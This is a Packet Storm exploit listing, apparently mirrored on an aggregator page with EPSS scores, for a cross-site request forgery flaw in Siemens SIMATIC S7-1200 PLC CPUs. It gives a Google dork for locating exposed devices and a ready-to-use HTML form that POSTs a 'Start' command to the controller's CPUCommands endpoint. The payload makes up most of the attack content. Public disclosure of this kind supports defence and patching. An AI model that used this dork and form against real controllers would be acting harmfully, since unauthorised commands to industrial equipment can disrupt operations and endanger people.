Lucene search

K
packetstormJameel NabboPACKETSTORM:147789
HistoryMay 22, 2018 - 12:00 a.m.

Siemens SIMATIC S7-1200 CPU Cross Site Request Forgery

2018-05-2200:00:00
Jameel Nabbo
packetstormsecurity.com
65

0.014 Low

EPSS

Percentile

86.2%

` <!--  
# Exploit Title: Siemens SIMATIC S7-1200 CPU CSRF Vulnerability  
# Google Dork: inurl:/Portal/Portal.mwsl  
# Date: 21-05-2018  
# Exploit Author: t4rkd3vilz, Jameel Nabbo  
# Vendor Homepage: https://www.siemens.com/  
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3  
# Tested on: Kali Linux  
# CVE: CVE-2015- 5698  
  
  
  
1. Proof of Concept  
  
-->  
  
<form method="POST" action="http://targetIp/CPUCommands  
<http://targetip/CPUCommands>">  
<input name="PriNav" value="Start">  
<input type="submit" value="Go!">  
</form>  
  
  
<!--  
`

0.014 Low

EPSS

Percentile

86.2%